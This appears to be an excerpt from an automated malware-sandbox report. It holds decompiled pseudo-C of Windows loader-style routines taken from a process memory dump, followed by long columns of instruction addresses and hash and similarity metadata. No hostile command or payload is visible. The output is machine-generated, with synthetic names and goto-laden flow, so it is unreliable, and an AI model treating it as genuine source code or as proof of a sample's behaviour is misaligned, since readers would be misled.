                        																								if(_t311 >= _t292) {
                        																									goto L143;
                        																								}
                        																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                        																								__eflags = _t371 - _t359;
                        																								if(_t371 < _t359) {
                        																									L98:
                        																									_t348 = _t348 + 0x28;
                        																									_t311 = _t311 + 1;
                        																									continue;
                        																								} else {
                        																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                        																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                        																										goto L98;
                        																									} else {
                        																										__eflags = _t348;
                        																										if(_t348 == 0) {
                        																											goto L143;
                        																										} else {
                        																											_t218 = _v40;
                        																											_t312 =  *_t218;
                        																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                        																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                        																												_v100 = _t359;
                        																												_t360 = _v108;
                        																												_t372 = L02BA8F44(_v108, _t312);
                        																												__eflags = _t372;
                        																												if(_t372 == 0) {
                        																													goto L143;
                        																												} else {
                        																													_t290 = _v52;
                        																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02BD3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                        																													_t307 = _v72;
                        																													_t344 = _v76;
                        																													_t218 = _v40;
                        																													goto L91;
                        																												}
                        																											} else {
                        																												_t290 = _v52;
                        																												_t307 = _v72;
                        																												_t344 = _v76;
                        																												_t369 = _v80;
                        																												L91:
                        																												_t358 = _a4;
                        																												__eflags = _t358;
                        																												if(_t358 == 0) {
                        																													L95:
                        																													_t308 = _a8;
                        																													__eflags = _t308;
                        																													if(_t308 != 0) {
                        																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                        																													}
                        																													_v8 = 0xfffffffe;
                        																													_t211 = _v84;
                        																												} else {
                        																													_t370 =  *_t218 - _t369 + _t290;
                        																													 *_t358 = _t370;
                        																													__eflags = _t370 - _t344;
                        																													if(_t370 <= _t344) {
                        																														L149:
                        																														 *_t358 = 0;
                        																														goto L150;
                        																													} else {
                        																														__eflags = _t307;
                        																														if(_t307 == 0) {
                        																															goto L95;
                        																														} else {
                        																															__eflags = _t370 - _t344 + _t307;
                        																															if(_t370 >= _t344 + _t307) {
                        																																goto L149;
                        																															} else {
                        																																goto L95;
                        																															}
                        																														}
                        																													}
                        																												}
                        																											}
                        																										}
                        																									}
                        																								}
                        																								goto L97;
                        																							}
                        																						}
                        																						goto L143;
                        																					}
                        																				}
                        																			}
                        																		} else {
                        																			__eflags = _v40 - _t307 + _t344;
                        																			if(_v40 >= _t307 + _t344) {
                        																				goto L150;
                        																			} else {
                        																				goto L75;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        															L97:
                        															 *[fs:0x0] = _v20;
                        															return _t211;
                        														}
                        													}
                        												}
                        											}
                        										} else {
                        											goto L46;
                        										}
                        									}
                        								}
                        								goto L151;
                        							}
                        							_t288 = _v164;
                        							_t366 = 0xc0000135;
                        							goto L41;
                        						}
                        					}
                        				}
                        				L151:
                        			}








































































































                        0x02bad5f2
                        0x02bad5f5
                        0x02bad5f5
                        0x02bad5fd
                        0x02bad600
                        0x02bad60a
                        0x02bad60d
                        0x02bad617
                        0x02bad61d
                        0x02bad627
                        0x02bad62e
                        0x02bad911
                        0x02bad913
                        0x00000000
                        0x02bad919
                        0x02bad919
                        0x02bad919
                        0x02bad634
                        0x02bad634
                        0x02bad634
                        0x02bad634
                        0x02bad640
                        0x02bad8bf
                        0x00000000
                        0x02bad646
                        0x02bad646
                        0x02bad64d
                        0x02bad652
                        0x02bfb2fc
                        0x02bfb2fc
                        0x02bfb302
                        0x02bfb33b
                        0x02bfb341
                        0x00000000
                        0x02bfb304
                        0x02bfb304
                        0x02bfb319
                        0x02bfb31e
                        0x02bfb324
                        0x02bfb326
                        0x02bfb332
                        0x02bfb347
                        0x02bfb34c
                        0x02bfb351
                        0x02bfb35a
                        0x00000000
                        0x02bfb328
                        0x02bfb328
                        0x00000000
                        0x02bfb328
                        0x02bfb326
                        0x02bad658
                        0x02bad658
                        0x02bad65b
                        0x02bad665
                        0x00000000
                        0x02bad66b
                        0x02bad66b
                        0x02bad66b
                        0x02bad66b
                        0x02bad66d
                        0x02bad672
                        0x02bad67a
                        0x00000000
                        0x00000000
                        0x02bad680
                        0x02bad686
                        0x02bad8ce
                        0x02bad8d4
                        0x02bad8dd
                        0x02bad8e0
                        0x02bad68c
                        0x02bad691
                        0x02bad69d
                        0x02bad6a2
                        0x02bad6a7
                        0x02bad6b0
                        0x02bad6b5
                        0x02bad6e0
                        0x02bad6b7
                        0x02bad6b7
                        0x02bad6b9
                        0x02bad6b9
                        0x02bad6bb
                        0x02bad6bd
                        0x02bad6ce
                        0x02bad6d0
                        0x02bad6d2
                        0x02bfb363
                        0x02bfb365
                        0x00000000
                        0x02bfb36b
                        0x00000000
                        0x02bfb36b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bad6bf
                        0x02bad6bf
                        0x02bad6e5
                        0x02bad6e7
                        0x02bad6e9
                        0x02bad6ec
                        0x02bad6ec
                        0x02bad6ef
                        0x02bad6f5
                        0x02bad6f9
                        0x02bad6fb
                        0x02bad6fd
                        0x02bad701
                        0x02bad703
                        0x02bad70a
                        0x02bad70a
                        0x02bad701
                        0x02bad710
                        0x02bad710
                        0x02bad6c1
                        0x02bad6c1
                        0x02bad6c6
                        0x02bfb36d
                        0x02bfb36f
                        0x00000000
                        0x02bfb375
                        0x02bfb375
                        0x02bfb375
                        0x00000000
                        0x02bfb375
                        0x00000000
                        0x02bad6cc
                        0x02bad6d8
                        0x02bad6d8
                        0x02bad6d8
                        0x00000000
                        0x02bad6c6
                        0x02bad6bf
                        0x00000000
                        0x02bad6da
                        0x02bad6da
                        0x02bad716
                        0x02bad71b
                        0x02bad720
                        0x02bad726
                        0x02bad726
                        0x02bad72d
                        0x00000000
                        0x02bad733
                        0x02bad739
                        0x02bad742
                        0x02bad750
                        0x02bad758
                        0x02bad764
                        0x02bad776
                        0x02bad77a
                        0x02bad783
                        0x02bad928
                        0x02bad92c
                        0x02bad93d
                        0x02bad944
                        0x02bad94f
                        0x02bad954
                        0x02bad956
                        0x02bad95f
                        0x02bad961
                        0x02bad973
                        0x02bad973
                        0x02bad956
                        0x02bad944
                        0x02bad92c
                        0x02bad78b
                        0x02bfb394
                        0x02bad791
                        0x02bad798
                        0x02bfb3a3
                        0x02bfb3bb
                        0x02bfb3bb
                        0x02bad7a5
                        0x02bad866
                        0x02bad870
                        0x02bad884
                        0x02bad892
                        0x02bad898
                        0x02bad89e
                        0x02bad8a0
                        0x02bad8a6
                        0x02bad8ac
                        0x02bad8ae
                        0x02bad8b4
                        0x02bad8b4
                        0x02bad8ae
                        0x02bad7a5
                        0x02bad78b
                        0x02bad7b1
                        0x02bfb3c5
                        0x02bfb3c5
                        0x02bad7c3
                        0x02bad7ca
                        0x02bad7e5
                        0x02bad7eb
                        0x02bad8eb
                        0x02bad8ed
                        0x00000000
                        0x02bad8f3
                        0x02bad8f3
                        0x02bad8f3
                        0x00000000
                        0x02bad8ed
                        0x02bad7cc
                        0x02bad7cc
                        0x02bad7d2
                        0x00000000
                        0x02bad7d4
                        0x02bad7d4
                        0x02bad7d7
                        0x02bad7df
                        0x02bfb3d4
                        0x02bfb3d9
                        0x02bfb3dc
                        0x02bfb3dc
                        0x02bfb3df
                        0x02bfb3e2
                        0x02bfb468
                        0x02bfb46d
                        0x02bfb46f
                        0x02bfb46f
                        0x02bfb475
                        0x02bad8f8
                        0x02bad8f9
                        0x02bad8fd
                        0x02bfb3e8
                        0x02bfb3e8
                        0x02bfb3eb
                        0x02bfb3ed
                        0x00000000
                        0x02bfb3ef
                        0x02bfb3ef
                        0x02bfb3f1
                        0x02bfb3f4
                        0x02bfb3fe
                        0x02bfb404
                        0x02bfb409
                        0x02bfb40e
                        0x02bfb410
                        0x02bfb410
                        0x02bfb414
                        0x02bfb414
                        0x02bfb41b
                        0x02bfb420
                        0x02bfb423
                        0x02bfb425
                        0x02bfb427
                        0x02bfb42a
                        0x02bfb42d
                        0x02bfb42d
                        0x02bfb42a
                        0x02bfb432
                        0x02bfb436
                        0x02bfb438
                        0x02bfb43b
                        0x02bfb43b
                        0x02bfb449
                        0x02bfb44e
                        0x02bfb454
                        0x02bfb458
                        0x02bfb458
                        0x02bfb45d
                        0x00000000
                        0x02bfb45d
                        0x02bfb3ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bad7df
                        0x02bad7d2
                        0x02bad7ca
                        0x02bfb37c
                        0x02bfb37e
                        0x02bfb385
                        0x02bfb38a
                        0x00000000
                        0x02bfb38a
                        0x02bad742
                        0x02bad7f1
                        0x02bad7f8
                        0x02bfb49b
                        0x02bfb49b
                        0x02bad800
                        0x02bad837
                        0x02bad843
                        0x02bad845
                        0x02bad847
                        0x02bad84a
                        0x02bad84b
                        0x02bad84e
                        0x02bad857
                        0x02bad802
                        0x02bad802
                        0x02bad80d
                        0x00000000
                        0x02bad818
                        0x02bad818
                        0x02bad824
                        0x02bad831
                        0x02bfb4a5
                        0x02bfb4ab
                        0x02bfb4b3
                        0x02bfb4b8
                        0x02bfb4bb
                        0x00000000
                        0x02bfb4c1
                        0x02bfb4c1
                        0x02bfb4c8
                        0x00000000
                        0x02bfb4ce
                        0x02bfb4d4
                        0x02bfb4e1
                        0x02bfb4e3
                        0x02bfb4e5
                        0x00000000
                        0x02bfb4eb
                        0x02bfb4f0
                        0x02bfb4f2
                        0x02badac9
                        0x02badacc
                        0x02badacf
                        0x02badad1
                        0x02badd78
                        0x02badd78
                        0x02badcf2
                        0x00000000
                        0x02badad7
                        0x02badad9
                        0x02badadb
                        0x00000000
                        0x00000000
                        0x02badae1
                        0x02badae1
                        0x02badae4
                        0x02badae6
                        0x02bfb4f9
                        0x02bfb4f9
                        0x02bfb500
                        0x02badaec
                        0x02badaec
                        0x02badaf5
                        0x02badaf8
                        0x02badafb
                        0x02badb03
                        0x02badb11
                        0x02badb16
                        0x02badb19
                        0x02badb1b
                        0x02bfb52c
                        0x02bfb531
                        0x02bfb534
                        0x02badb21
                        0x02badb21
                        0x02badb24
                        0x02badcd9
                        0x02badce2
                        0x02badce5
                        0x02badd6a
                        0x02badd6d
                        0x00000000
                        0x02badd73
                        0x02bfb51a
                        0x02bfb51c
                        0x02bfb51f
                        0x02bfb524
                        0x00000000
                        0x02bfb524
                        0x02badce7
                        0x02badce7
                        0x02badce7
                        0x00000000
                        0x02badce7
                        0x00000000
                        0x02badb2a
                        0x02badb2c
                        0x02badb31
                        0x02badb33
                        0x02badb36
                        0x02badb39
                        0x02badb3b
                        0x02badb66
                        0x02badb66
                        0x02badb3d
                        0x02badb3d
                        0x02badb3e
                        0x02badb46
                        0x02badb47
                        0x02badb49
                        0x02badb4c
                        0x02badb53
                        0x02badb55
                        0x02badb58
                        0x02badb5a
                        0x02bfb50a
                        0x02bfb50f
                        0x02bfb512
                        0x02badb60
                        0x02badb60
                        0x02badb63
                        0x02badb63
                        0x00000000
                        0x02badb63
                        0x02badb5a
                        0x02badb3b
                        0x02badb24
                        0x02badb69
                        0x02badb69
                        0x02badb6c
                        0x02badb6f
                        0x02badb74
                        0x02bfb557
                        0x02bfb557
                        0x02bfb55e
                        0x02badb7a
                        0x02badb7c
                        0x02badb7f
                        0x02badb82
                        0x02badb85
                        0x00000000
                        0x02badb8b
                        0x02badb8b
                        0x02badb8d
                        0x02badb9b
                        0x02badb9b
                        0x02badb9d
                        0x02badba0
                        0x02badba2
                        0x02badba4
                        0x02badba7
                        0x02badba9
                        0x02badbae
                        0x02badbae
                        0x02badbb1
                        0x02badbb4
                        0x02badbb4
                        0x02badbb7
                        0x02badbba
                        0x02badcd2
                        0x02badcd4
                        0x00000000
                        0x02badbc0
                        0x02badbc0
                        0x02badbd2
                        0x02badbd7
                        0x02badbda
                        0x02badbdd
                        0x02badbdf
                        0x00000000
                        0x02badbe5
                        0x02badbe5
                        0x02badbee
                        0x02badbf1
                        0x02bfb541
                        0x02bfb544
                        0x00000000
                        0x02bfb546
                        0x02bfb546
                        0x00000000
                        0x02bfb546
                        0x02badbf7
                        0x02badbf7
                        0x02badbfd
                        0x02badbfd
                        0x02badbff
                        0x02badc0b
                        0x02badc15
                        0x02badc1b
                        0x02badc1d
                        0x02badc21
                        0x02badc21
                        0x02badc23
                        0x02badc23
                        0x02badc26
                        0x02badc29
                        0x02badc2b
                        0x00000000
                        0x00000000
                        0x02badc31
                        0x02badc34
                        0x02badc36
                        0x02badcbf
                        0x02badcbf
                        0x02badcc2
                        0x00000000
                        0x02badc3c
                        0x02badc41
                        0x02badc43
                        0x00000000
                        0x02badc45
                        0x02badc45
                        0x02badc47
                        0x00000000
                        0x02badc4d
                        0x02badc4d
                        0x02badc50
                        0x02badc52
                        0x02badc55
                        0x02badcfa
                        0x02badcfe
                        0x02badd08
                        0x02badd0a
                        0x02badd0c
                        0x00000000
                        0x02badd12
                        0x02badd15
                        0x02badd2d
                        0x02badd2f
                        0x02badd32
                        0x02badd35
                        0x00000000
                        0x02badd35
                        0x02badc5b
                        0x02badc5b
                        0x02badc5e
                        0x02badc61
                        0x02badc64
                        0x02badc67
                        0x02badc67
                        0x02badc6a
                        0x02badc6c
                        0x02badc8e
                        0x02badc8e
                        0x02badc91
                        0x02badc93
                        0x02badcce
                        0x02badcce
                        0x02badc95
                        0x02badc9c
                        0x02badc6e
                        0x02badc72
                        0x02badc75
                        0x02badc77
                        0x02badc79
                        0x02bfb551
                        0x02bfb551
                        0x00000000
                        0x02badc7f
                        0x02badc7f
                        0x02badc81
                        0x00000000
                        0x02badc83
                        0x02badc86
                        0x02badc88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02badc88
                        0x02badc81
                        0x02badc79
                        0x02badc6c
                        0x02badc55
                        0x02badc47
                        0x02badc43
                        0x00000000
                        0x02badc36
                        0x02badc23
                        0x00000000
                        0x02badbff
                        0x02badbf1
                        0x02badbdf
                        0x02badb8f
                        0x02badb92
                        0x02badb95
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02badb95
                        0x02badb8d
                        0x02badb85
                        0x02badb74
                        0x02badc9f
                        0x02badca2
                        0x02badcb0
                        0x02badcb0
                        0x02badad1
                        0x02bfb4e5
                        0x02bfb4c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bad831
                        0x02bad80d
                        0x00000000
                        0x02bad800
                        0x02bfb47f
                        0x02bfb485
                        0x00000000
                        0x02bfb485
                        0x02bad665
                        0x02bad652
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53c81e32e73af770164dacf9f48198a9b0f1e4f971d22b4dd0ec7c9cc492d425
                        • Instruction ID: f8860df152df93f90debe585d965cb568a96fee4f5ff8a2e6e97f24be57edcb9
                        • Opcode Fuzzy Hash: 53c81e32e73af770164dacf9f48198a9b0f1e4f971d22b4dd0ec7c9cc492d425
                        • Instruction Fuzzy Hash: 2CE1D330A0835ACFDB24DF18C964BA9B7B6FF45308F1442E9D90997690DB70AD85CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BA849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                        				void* _t136;
                        				signed int _t139;
                        				signed int _t141;
                        				signed int _t145;
                        				intOrPtr _t146;
                        				signed int _t149;
                        				signed int _t150;
                        				signed int _t161;
                        				signed int _t163;
                        				signed int _t165;
                        				signed int _t169;
                        				signed int _t171;
                        				signed int _t194;
                        				signed int _t200;
                        				void* _t201;
                        				signed int _t204;
                        				signed int _t206;
                        				signed int _t210;
                        				signed int _t214;
                        				signed int _t215;
                        				signed int _t218;
                        				void* _t221;
                        				signed int _t224;
                        				signed int _t226;
                        				intOrPtr _t228;
                        				signed int _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				void* _t237;
                        				void* _t238;
                        
                        				_t236 = __esi;
                        				_t235 = __edi;
                        				_t193 = __ebx;
                        				_push(0x70);
                        				_push(0x2c6f9c0);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                        				if( *0x2c87b04 == 0) {
                        					L4:
                        					goto L5;
                        				} else {
                        					_t136 = E02BACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                        					_t236 = 0;
                        					if(_t136 < 0) {
                        						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                        					}
                        					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                        						_t193 =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x68) = _t236;
                        						 *(_t237 - 0x6c) = _t236;
                        						_t235 = _t236;
                        						 *(_t237 - 0x60) = _t236;
                        						E02BB2280( *[fs:0x30], 0x2c88550);
                        						_t139 =  *0x2c87b04; // 0x1
                        						__eflags = _t139 - 1;
                        						if(__eflags != 0) {
                        							_t200 = 0xc;
                        							_t201 = _t237 - 0x40;
                        							_t141 = E02BCF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                        							 *(_t237 - 0x44) = _t141;
                        							__eflags = _t141;
                        							if(_t141 < 0) {
                        								L50:
                        								E02BAFFB0(_t193, _t235, 0x2c88550);
                        								L5:
                        								return E02BED130(_t193, _t235, _t236);
                        							}
                        							_push(_t201);
                        							_t221 = 0x10;
                        							_t202 =  *(_t237 - 0x40);
                        							_t145 = E02B91C45( *(_t237 - 0x40), _t221);
                        							 *(_t237 - 0x44) = _t145;
                        							__eflags = _t145;
                        							if(_t145 < 0) {
                        								goto L50;
                        							}
                        							_t146 =  *0x2c87b9c; // 0x0
                        							_t235 = L02BB4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                        							 *(_t237 - 0x60) = _t235;
                        							__eflags = _t235;
                        							if(_t235 == 0) {
                        								_t149 = 0xc0000017;
                        								 *(_t237 - 0x44) = 0xc0000017;
                        							} else {
                        								_t149 =  *(_t237 - 0x44);
                        							}
                        							__eflags = _t149;
                        							if(__eflags >= 0) {
                        								L8:
                        								 *(_t237 - 0x64) = _t235;
                        								_t150 =  *0x2c87b10; // 0x8
                        								 *(_t237 - 0x4c) = _t150;
                        								_push(_t237 - 0x74);
                        								_push(_t237 - 0x39);
                        								_push(_t237 - 0x58);
                        								_t193 = E02BCA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                        								 *(_t237 - 0x44) = _t193;
                        								__eflags = _t193;
                        								if(_t193 < 0) {
                        									L30:
                        									E02BAFFB0(_t193, _t235, 0x2c88550);
                        									__eflags = _t235 - _t237 - 0x38;
                        									if(_t235 != _t237 - 0x38) {
                        										_t235 =  *(_t237 - 0x48);
                        										L02BB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                        									} else {
                        										_t235 =  *(_t237 - 0x48);
                        									}
                        									__eflags =  *(_t237 - 0x6c);
                        									if( *(_t237 - 0x6c) != 0) {
                        										L02BB77F0(_t235, _t236,  *(_t237 - 0x6c));
                        									}
                        									__eflags = _t193;
                        									if(_t193 >= 0) {
                        										goto L4;
                        									} else {
                        										goto L5;
                        									}
                        								}
                        								_t204 =  *0x2c87b04; // 0x1
                        								 *(_t235 + 8) = _t204;
                        								__eflags =  *((char*)(_t237 - 0x39));
                        								if( *((char*)(_t237 - 0x39)) != 0) {
                        									 *(_t235 + 4) = 1;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                        									_t161 =  *0x2c87b10; // 0x8
                        									 *(_t237 - 0x4c) = _t161;
                        								} else {
                        									 *(_t235 + 4) = _t236;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                        								}
                        								 *((intOrPtr*)(_t237 - 0x54)) = E02BD37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                        								_t224 = _t236;
                        								 *(_t237 - 0x40) = _t236;
                        								 *(_t237 - 0x50) = _t236;
                        								while(1) {
                        									_t163 =  *(_t235 + 8);
                        									__eflags = _t224 - _t163;
                        									if(_t224 >= _t163) {
                        										break;
                        									}
                        									_t228 =  *0x2c87b9c; // 0x0
                        									_t214 = L02BB4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                        									 *(_t237 - 0x78) = _t214;
                        									__eflags = _t214;
                        									if(_t214 == 0) {
                        										L52:
                        										_t193 = 0xc0000017;
                        										L19:
                        										 *(_t237 - 0x44) = _t193;
                        										L20:
                        										_t206 =  *(_t237 - 0x40);
                        										__eflags = _t206;
                        										if(_t206 == 0) {
                        											L26:
                        											__eflags = _t193;
                        											if(_t193 < 0) {
                        												E02BD37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) != 0) {
                        													 *0x2c87b10 =  *0x2c87b10 - 8;
                        												}
                        											} else {
                        												_t169 =  *(_t237 - 0x68);
                        												__eflags = _t169;
                        												if(_t169 != 0) {
                        													 *0x2c87b04 =  *0x2c87b04 - _t169;
                        												}
                        											}
                        											__eflags = _t193;
                        											if(_t193 >= 0) {
                        												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                        											}
                        											goto L30;
                        										}
                        										_t226 = _t206 * 0xc;
                        										__eflags = _t226;
                        										_t194 =  *(_t237 - 0x48);
                        										do {
                        											 *(_t237 - 0x40) = _t206 - 1;
                        											_t226 = _t226 - 0xc;
                        											 *(_t237 - 0x4c) = _t226;
                        											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                        											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                        												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                        												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                        													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                        													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        													__eflags =  *((char*)(_t237 - 0x39));
                        													if( *((char*)(_t237 - 0x39)) == 0) {
                        														_t171 = _t210;
                        													} else {
                        														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                        														L02BB77F0(_t194, _t236, _t210 - 8);
                        														_t171 =  *(_t237 - 0x50);
                        													}
                        													L48:
                        													L02BB77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                        													L46:
                        													_t206 =  *(_t237 - 0x40);
                        													_t226 =  *(_t237 - 0x4c);
                        													goto L24;
                        												}
                        												 *0x2c87b08 =  *0x2c87b08 + 1;
                        												goto L24;
                        											}
                        											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        											__eflags = _t171;
                        											if(_t171 != 0) {
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) == 0) {
                        													goto L48;
                        												}
                        												E02BD57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                        												goto L46;
                        											}
                        											L24:
                        											__eflags = _t206;
                        										} while (_t206 != 0);
                        										_t193 =  *(_t237 - 0x44);
                        										goto L26;
                        									}
                        									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                        									 *(_t237 - 0x7c) = _t232;
                        									 *(_t232 - 4) = _t214;
                        									 *(_t237 - 4) = _t236;
                        									E02BDF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                        									_t238 = _t238 + 0xc;
                        									 *(_t237 - 4) = 0xfffffffe;
                        									_t215 =  *(_t237 - 0x48);
                        									__eflags = _t193;
                        									if(_t193 < 0) {
                        										L02BB77F0(_t215, _t236,  *(_t237 - 0x78));
                        										goto L20;
                        									}
                        									__eflags =  *((char*)(_t237 - 0x39));
                        									if( *((char*)(_t237 - 0x39)) != 0) {
                        										_t233 = E02BCA44B( *(_t237 - 0x4c));
                        										 *(_t237 - 0x50) = _t233;
                        										__eflags = _t233;
                        										if(_t233 == 0) {
                        											L02BB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                        											goto L52;
                        										}
                        										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                        										L17:
                        										_t234 =  *(_t237 - 0x40);
                        										_t218 = _t234 * 0xc;
                        										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                        										 *(_t218 + _t235 + 0x10) = _t236;
                        										_t224 = _t234 + 1;
                        										 *(_t237 - 0x40) = _t224;
                        										 *(_t237 - 0x50) = _t224;
                        										_t193 =  *(_t237 - 0x44);
                        										continue;
                        									}
                        									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                        									goto L17;
                        								}
                        								 *_t235 = _t236;
                        								_t165 = 0x10 + _t163 * 0xc;
                        								__eflags = _t165;
                        								_push(_t165);
                        								_push(_t235);
                        								_push(0x23);
                        								_push(0xffffffff);
                        								_t193 = E02BD96C0();
                        								goto L19;
                        							} else {
                        								goto L50;
                        							}
                        						}
                        						_t235 = _t237 - 0x38;
                        						 *(_t237 - 0x60) = _t235;
                        						goto L8;
                        					}
                        					goto L4;
                        				}
                        			}

































                        0x02ba849b
                        0x02ba849b
                        0x02ba849b
                        0x02ba849b
                        0x02ba849d
                        0x02ba84a2
                        0x02ba84a7
                        0x02ba84b1
                        0x02ba84d8
                        0x00000000
                        0x02ba84b3
                        0x02ba84c4
                        0x02ba84c9
                        0x02ba84cd
                        0x02ba84cf
                        0x02ba84cf
                        0x02ba84d6
                        0x02ba84e6
                        0x02ba84e9
                        0x02ba84ec
                        0x02ba84ef
                        0x02ba84f2
                        0x02ba84f4
                        0x02ba84fc
                        0x02ba8501
                        0x02ba8506
                        0x02ba8509
                        0x02ba86e0
                        0x02ba86e5
                        0x02ba86e8
                        0x02ba86ed
                        0x02ba86f0
                        0x02ba86f2
                        0x02bf9afd
                        0x02bf9b02
                        0x02ba84da
                        0x02ba84df
                        0x02ba84df
                        0x02ba86fa
                        0x02ba86fd
                        0x02ba86fe
                        0x02ba8701
                        0x02ba8706
                        0x02ba8709
                        0x02ba870b
                        0x00000000
                        0x00000000
                        0x02ba8711
                        0x02ba8725
                        0x02ba8727
                        0x02ba872a
                        0x02ba872c
                        0x02bf9af0
                        0x02bf9af5
                        0x02ba8732
                        0x02ba8732
                        0x02ba8732
                        0x02ba8735
                        0x02ba8737
                        0x02ba8515
                        0x02ba8515
                        0x02ba8518
                        0x02ba851d
                        0x02ba8523
                        0x02ba8527
                        0x02ba852b
                        0x02ba8537
                        0x02ba8539
                        0x02ba853c
                        0x02ba853e
                        0x02ba868c
                        0x02ba8691
                        0x02ba8699
                        0x02ba869b
                        0x02ba8744
                        0x02ba8748
                        0x02ba86a1
                        0x02ba86a1
                        0x02ba86a1
                        0x02ba86a4
                        0x02ba86a8
                        0x02bf9bdf
                        0x02bf9bdf
                        0x02ba86ae
                        0x02ba86b0
                        0x00000000
                        0x02ba86b6
                        0x00000000
                        0x02bf9be9
                        0x02ba86b0
                        0x02ba8544
                        0x02ba854a
                        0x02ba854d
                        0x02ba8551
                        0x02ba876e
                        0x02ba8778
                        0x02ba877b
                        0x02ba8780
                        0x02ba8557
                        0x02ba8557
                        0x02ba855d
                        0x02ba855d
                        0x02ba856b
                        0x02ba856e
                        0x02ba8570
                        0x02ba8573
                        0x02ba8576
                        0x02ba8576
                        0x02ba8579
                        0x02ba857b
                        0x00000000
                        0x00000000
                        0x02ba8581
                        0x02ba85a0
                        0x02ba85a2
                        0x02ba85a5
                        0x02ba85a7
                        0x02bf9b1b
                        0x02bf9b1b
                        0x02ba862e
                        0x02ba862e
                        0x02ba8631
                        0x02ba8631
                        0x02ba8634
                        0x02ba8636
                        0x02ba8669
                        0x02ba8669
                        0x02ba866b
                        0x02bf9bbf
                        0x02bf9bc4
                        0x02bf9bc8
                        0x02bf9bce
                        0x02bf9bce
                        0x02ba8671
                        0x02ba8671
                        0x02ba8674
                        0x02ba8676
                        0x02bf9bae
                        0x02bf9bae
                        0x02ba8676
                        0x02ba867c
                        0x02ba867e
                        0x02ba8688
                        0x02ba8688
                        0x00000000
                        0x02ba867e
                        0x02ba8638
                        0x02ba8638
                        0x02ba863b
                        0x02ba863e
                        0x02ba863f
                        0x02ba8642
                        0x02ba8645
                        0x02ba8648
                        0x02ba864d
                        0x02bf9b69
                        0x02bf9b6e
                        0x02bf9b7b
                        0x02bf9b81
                        0x02bf9b85
                        0x02bf9b89
                        0x02bf9ba7
                        0x02bf9b8b
                        0x02bf9b91
                        0x02bf9b9a
                        0x02bf9b9f
                        0x02bf9b9f
                        0x02ba8788
                        0x02ba878d
                        0x02ba8763
                        0x02ba8763
                        0x02ba8766
                        0x00000000
                        0x02ba8766
                        0x02bf9b70
                        0x00000000
                        0x02bf9b70
                        0x02ba8656
                        0x02ba865a
                        0x02ba865c
                        0x02ba8752
                        0x02ba8756
                        0x00000000
                        0x00000000
                        0x02ba875e
                        0x00000000
                        0x02ba875e
